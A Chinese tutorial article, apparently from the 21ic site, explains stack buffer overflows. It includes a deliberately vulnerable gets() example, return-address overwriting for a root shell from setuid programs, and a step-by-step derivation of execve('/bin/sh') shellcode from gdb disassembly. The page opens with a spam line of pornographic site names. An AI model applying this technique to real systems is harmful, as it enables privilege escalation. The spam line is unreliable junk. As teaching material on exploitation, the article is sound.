www.久久久久|狼友网站av天堂|精品国产无码a片|一级av色欲av|91在线播放视频|亚洲无码主播在线|国产精品草久在线|明星AV网站在线|污污内射久久一区|婷婷综合视频网站

當(dāng)前位置:首頁 > 單片機 > 單片機

堆棧溢出技術(shù)從入門到精通

時間:2018-06-25 10:26:41
關(guān)鍵字: 堆棧   
手機看文章

掃描二維碼
隨時隨地手機看文章

[導(dǎo)讀] 雖然溢出在程序開發(fā)過程中不可完全避免,但溢出對系統(tǒng)的威脅是巨大的,由于系統(tǒng)的特殊性,溢出發(fā)生時攻擊者可以利用其漏洞來獲取系統(tǒng)的高級權(quán)限r(nóng)oot,因此本文將詳細介紹堆棧溢出技術(shù)……在您開始了解堆

 雖然溢出在程序開發(fā)過程中不可完全避免,但溢出對系統(tǒng)的威脅是巨大的,由于系統(tǒng)的特殊性,溢出發(fā)生時攻擊者可以利用其漏洞來獲取系統(tǒng)的高級權(quán)限r(nóng)oot,因此本文將詳細介紹堆棧溢出技術(shù)……

在您開始了解堆棧溢出前,首先你應(yīng)該了解win32匯編語言,熟悉寄存器的組成和功能。你必須有堆棧和存儲分配方面的基礎(chǔ)知識,有關(guān)這方面的計算機書籍很多,我將只是簡單闡述原理,著重在應(yīng)用。其次,你應(yīng)該了解linux,本講中我們的例子將在linux上開發(fā)。

1、首先復(fù)習(xí)一下基礎(chǔ)知識。

從物理上講,堆棧是就是一段連續(xù)分配的內(nèi)存空間。在一個程序中,會聲明各種變量。靜態(tài)全局變量是位于數(shù)據(jù)段并且在程序開始運行的時候被加載。而程序的動態(tài)的局部變量則分配在堆棧里面。

從操作上來講,堆棧是一個先入后出的隊列。他的生長方向與內(nèi)存的生長方向正好相反。我們規(guī)定內(nèi)存的生長方向為向上,則棧的生長方向為向下。壓棧的操作push=ESP-4,出棧的操作是pop=ESP+4.換句話說,堆棧中老的值,其內(nèi)存地址,反而比新的值要大。請牢牢記住這一點,因為這是堆棧溢出的基本理論依據(jù)。

在一次函數(shù)調(diào)用中,堆棧中將被依次壓入:參數(shù),返回地址,EBP。如果函數(shù)有局部變量,接下來,就在堆棧中開辟相應(yīng)的空間以構(gòu)造變量。函數(shù)執(zhí)行結(jié)束,這些局部變量的內(nèi)容將被丟失。但是不被清除。在函數(shù)返回的時候,彈出EBP,恢復(fù)堆棧到函數(shù)調(diào)用的地址,彈出返回地址到EIP以繼續(xù)執(zhí)行程序。

在C語言程序中,參數(shù)的壓棧順序是反向的。比如func(a,b,c)。在參數(shù)入棧的時候,是:先壓c,再壓b,最后a。在取參數(shù)的時候,由于棧的先入后出,先取棧頂?shù)腶,再取b,最后取c。這些是匯編語言的基礎(chǔ)知識,用戶在開始前必須要了解這些知識。

2、現(xiàn)在我們來看一看什么是堆棧溢出。

運行時的堆棧分配

堆棧溢出就是不顧堆棧中數(shù)據(jù)塊大小,向該數(shù)據(jù)塊寫入了過多的數(shù)據(jù),導(dǎo)致數(shù)據(jù)越界,結(jié)果覆蓋了老的堆棧數(shù)據(jù)。

例如程序一:

      #include  
int main ( ) 

char name[8]; 
printf("Please type your name: "); 
gets(name); 
printf("Hello, %s!", name); 
return 0; 
}

編譯并且執(zhí)行,我們輸入ipxodi,就會輸出Hello,ipxodi!。程序運行中,堆棧是怎么操作的呢?

在main函數(shù)開始運行的時候,堆棧里面將被依次放入返回地址,EBP。

我們用gcc -S 來獲得匯編語言輸出,可以看到main函數(shù)的開頭部分對應(yīng)如下語句:

      pushl %ebp 
movl %esp,%ebp 
subl $8,%esp

首先他把EBP保存下來,,然后EBP等于現(xiàn)在的ESP,這樣EBP就可以用來訪問本函數(shù)的局部變量。之后ESP減8,就是堆棧向上增長8個字節(jié),用來存放name[]數(shù)組。最后,main返回,彈出ret里的地址,賦值給EIP,CPU繼續(xù)執(zhí)行EIP所指向的指令。

堆棧溢出

現(xiàn)在我們再執(zhí)行一次,輸入ipxodiAAAAAAAAAAAAAAA,執(zhí)行完gets(name)之后,由于我們輸入的name字符串太長,name數(shù)組容納不下,只好向內(nèi)存頂部繼續(xù)寫‘A’。由于堆棧的生長方向與內(nèi)存的生長方向相反,這些‘A’覆蓋了堆棧的老的元素。 我們可以發(fā)現(xiàn),EBP,ret都已經(jīng)被‘A’覆蓋了。在main返回的時候,就會把‘AAAA’的ASCII碼:0x41414141作為返回地址,CPU會試圖執(zhí)行0x41414141處的指令,結(jié)果出現(xiàn)錯誤。這就是一次堆棧溢出。

3、如何利用堆棧溢出

我們已經(jīng)制造了一次堆棧溢出。其原理可以概括為:由于字符串處理函數(shù)(gets,strcpy等等)沒有對數(shù)組越界加以監(jiān)視和限制,我們利用字符數(shù)組寫越界,覆蓋堆棧中的老元素的值,就可以修改返回地址。

在上面的例子中,這導(dǎo)致CPU去訪問一個不存在的指令,結(jié)果出錯。事實上,當(dāng)堆棧溢出的時候,我們已經(jīng)完全的控制了這個程序下一步的動作。如果我們用一個實際存在指令地址來覆蓋這個返回地址,CPU就會轉(zhuǎn)而執(zhí)行我們的指令。

在UINX/linux系統(tǒng)中,我們的指令可以執(zhí)行一個shell,這個shell將獲得和被我們堆棧溢出的程序相同的權(quán)限。如果這個程序是setuid的,那么我們就可以獲得root shell。下一講將敘述如何書寫一個shell code。

如何書寫一個shell code

一:shellcode基本算法分析

在程序中,執(zhí)行一個shell的程序是這樣寫的:

      shellcode.c 
------------------------------------------------------------------------ 
#include  
void main() { 
char *name[2]; 
name[0] = "/bin/sh" 
name[1] = NULL; 
execve(name[0], name, NULL); 

------------------------------------------------------------------------

execve函數(shù)將執(zhí)行一個程序。他需要程序的名字地址作為第一個參數(shù)。一個內(nèi)容為該程序的argv[i](argv[n-1]=0)的指針數(shù)組作為第二個參數(shù),以及(char*) 0作為第三個參數(shù)。

我們來看以看execve的匯編代碼:

      [nkl10]$Content$nbsp;gcc -o shellcode -static shellcode.c 
[nkl10]$Content$nbsp;gdb shellcode 
(gdb) disassemble __execve 
Dump of assembler code for function __execve: 
0x80002bc <__execve>: pushl %ebp ; 
0x80002bd <__execve+1>: movl %esp,%ebp 
;上面是函數(shù)頭。 
0x80002bf <__execve+3>: pushl %ebx 
;保存ebx 
0x80002c0 <__execve+4>: movl $0xb,%eax 
;eax=0xb,eax指明第幾號系統(tǒng)調(diào)用。 
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx 
;ebp+8是第一個參數(shù)"/bin/sh\0" 
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx 
;ebp+12是第二個參數(shù)name數(shù)組的地址 
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx 
;ebp+16是第三個參數(shù)空指針的地址。 
;name[2-1]內(nèi)容為NULL,用來存放返回值。 
0x80002ce <__execve+18>: int $0x80 
;執(zhí)行0xb號系統(tǒng)調(diào)用(execve) 
0x80002d0 <__execve+20>: movl %eax,%edx 
;下面是返回值的處理就沒有用了。 
0x80002d2 <__execve+22>: testl %edx,%edx 
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42> 
0x80002d6 <__execve+26>: negl %edx 
0x80002d8 <__execve+28>: pushl %edx 
0x80002d9 <__execve+29>: call 0x8001a34 
<__normal_errno_location> 
0x80002de <__execve+34>: popl %edx 
0x80002df <__execve+35>: movl %edx,(%eax) 
0x80002e1 <__execve+37>: movl $0xffffffff,%eax 
0x80002e6 <__execve+42>: popl %ebx 
0x80002e7 <__execve+43>: movl %ebp,%esp 
0x80002e9 <__execve+45>: popl %ebp 
0x80002ea <__execve+46>: ret 
0x80002eb <__execve+47>: nop 
End of assembler dump.

經(jīng)過以上的分析,可以得到如下的精簡指令算法:

      movl $execve的系統(tǒng)調(diào)用號,%eax 
movl "bin/sh\0"的地址,%ebx 
movl name數(shù)組的地址,%ecx 
movl name[n-1]的地址,%edx 
int $0x80 ;執(zhí)行系統(tǒng)調(diào)用(execve)

當(dāng)execve執(zhí)行成功后,程序shellcode就會退出,/bin/sh將作為子進程繼續(xù)執(zhí)行??墒牵绻覀兊膃xecve執(zhí)行失敗,(比如沒有/bin/sh這個文件),CPU就會繼續(xù)執(zhí)行后續(xù)的指令,結(jié)果不知道跑到哪里去了。所以必須再執(zhí)行一個exit()系統(tǒng)調(diào)用,結(jié)束shellcode.c的執(zhí)行。

我們來看以看exit(0)的匯編代碼:

      (gdb) disassemble _exit 
Dump of assembler code for function _exit: 
0x800034c <_exit>: pushl %ebp 
0x800034d <_exit+1>: movl %esp,%ebp 
0x800034f <_exit+3>: pushl %ebx 
0x8000350 <_exit+4>: movl $0x1,%eax ;1號系統(tǒng)調(diào)用 
0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx ;ebx為參數(shù)0 
0x8000358 <_exit+12>: int $0x80 ;引發(fā)系統(tǒng)調(diào)用 
0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx 
0x800035d <_exit+17>: movl %ebp,%esp 
0x800035f <_exit+19>: popl %ebp 
0x8000360 <_exit+20>: ret 
0x8000361 <_exit+21>: nop 
0x8000362 <_exit+22>: nop 
0x8000363 <_exit+23>: nop 
End of assembler dump.

看來exit(0)〕的匯編代碼更加簡單:

   movl $0x1,%eax ;1號系統(tǒng)調(diào)用 
movl 0,%ebx ;ebx為exit的參數(shù)0 
int $0x80 ;引發(fā)系統(tǒng)調(diào)用

那么總結(jié)一下,合成的匯編代碼為:

      movl $execve的系統(tǒng)調(diào)用號,%eax 
movl "bin/sh\0"的地址,%ebx 
movl name數(shù)組的地址,%ecx 
movl name[n-1]的地址,%edx 
int $0x80 ;執(zhí)行系統(tǒng)調(diào)用(execve) 
movl $0x1,%eax ;1號系統(tǒng)調(diào)用 
movl 0,%ebx ;ebx為exit的參數(shù)0 
int $0x80 ;執(zhí)行系統(tǒng)調(diào)用(exit)

來源:21ic整理

作者:jianghuan

本站聲明: 本文章由作者或相關(guān)機構(gòu)授權(quán)發(fā)布,目的在于傳遞更多信息,并不代表本站贊同其觀點,本站亦不保證或承諾內(nèi)容真實性等。需要轉(zhuǎn)載請聯(lián)系該專欄作者,如若文章內(nèi)容侵犯您的權(quán)益,請及時聯(lián)系本站刪除。
換一批
延伸閱讀

9月2日消息,不造車的華為或?qū)⒋呱龈蟮莫毥谦F公司,隨著阿維塔和賽力斯的入局,華為引望愈發(fā)顯得引人矚目。

關(guān)鍵字: 阿維塔 塞力斯 華為

加利福尼亞州圣克拉拉縣2024年8月30日 /美通社/ -- 數(shù)字化轉(zhuǎn)型技術(shù)解決方案公司Trianz今天宣布,該公司與Amazon Web Services (AWS)簽訂了...

關(guān)鍵字: AWS AN BSP 數(shù)字化

倫敦2024年8月29日 /美通社/ -- 英國汽車技術(shù)公司SODA.Auto推出其旗艦產(chǎn)品SODA V,這是全球首款涵蓋汽車工程師從創(chuàng)意到認證的所有需求的工具,可用于創(chuàng)建軟件定義汽車。 SODA V工具的開發(fā)耗時1.5...

關(guān)鍵字: 汽車 人工智能 智能驅(qū)動 BSP

北京2024年8月28日 /美通社/ -- 越來越多用戶希望企業(yè)業(yè)務(wù)能7×24不間斷運行,同時企業(yè)卻面臨越來越多業(yè)務(wù)中斷的風(fēng)險,如企業(yè)系統(tǒng)復(fù)雜性的增加,頻繁的功能更新和發(fā)布等。如何確保業(yè)務(wù)連續(xù)性,提升韌性,成...

關(guān)鍵字: 亞馬遜 解密 控制平面 BSP

8月30日消息,據(jù)媒體報道,騰訊和網(wǎng)易近期正在縮減他們對日本游戲市場的投資。

關(guān)鍵字: 騰訊 編碼器 CPU

8月28日消息,今天上午,2024中國國際大數(shù)據(jù)產(chǎn)業(yè)博覽會開幕式在貴陽舉行,華為董事、質(zhì)量流程IT總裁陶景文發(fā)表了演講。

關(guān)鍵字: 華為 12nm EDA 半導(dǎo)體

8月28日消息,在2024中國國際大數(shù)據(jù)產(chǎn)業(yè)博覽會上,華為常務(wù)董事、華為云CEO張平安發(fā)表演講稱,數(shù)字世界的話語權(quán)最終是由生態(tài)的繁榮決定的。

關(guān)鍵字: 華為 12nm 手機 衛(wèi)星通信

要點: 有效應(yīng)對環(huán)境變化,經(jīng)營業(yè)績穩(wěn)中有升 落實提質(zhì)增效舉措,毛利潤率延續(xù)升勢 戰(zhàn)略布局成效顯著,戰(zhàn)新業(yè)務(wù)引領(lǐng)增長 以科技創(chuàng)新為引領(lǐng),提升企業(yè)核心競爭力 堅持高質(zhì)量發(fā)展策略,塑強核心競爭優(yōu)勢...

關(guān)鍵字: 通信 BSP 電信運營商 數(shù)字經(jīng)濟

北京2024年8月27日 /美通社/ -- 8月21日,由中央廣播電視總臺與中國電影電視技術(shù)學(xué)會聯(lián)合牽頭組建的NVI技術(shù)創(chuàng)新聯(lián)盟在BIRTV2024超高清全產(chǎn)業(yè)鏈發(fā)展研討會上宣布正式成立。 活動現(xiàn)場 NVI技術(shù)創(chuàng)新聯(lián)...

關(guān)鍵字: VI 傳輸協(xié)議 音頻 BSP

北京2024年8月27日 /美通社/ -- 在8月23日舉辦的2024年長三角生態(tài)綠色一體化發(fā)展示范區(qū)聯(lián)合招商會上,軟通動力信息技術(shù)(集團)股份有限公司(以下簡稱"軟通動力")與長三角投資(上海)有限...

關(guān)鍵字: BSP 信息技術(shù)
關(guān)閉
關(guān)閉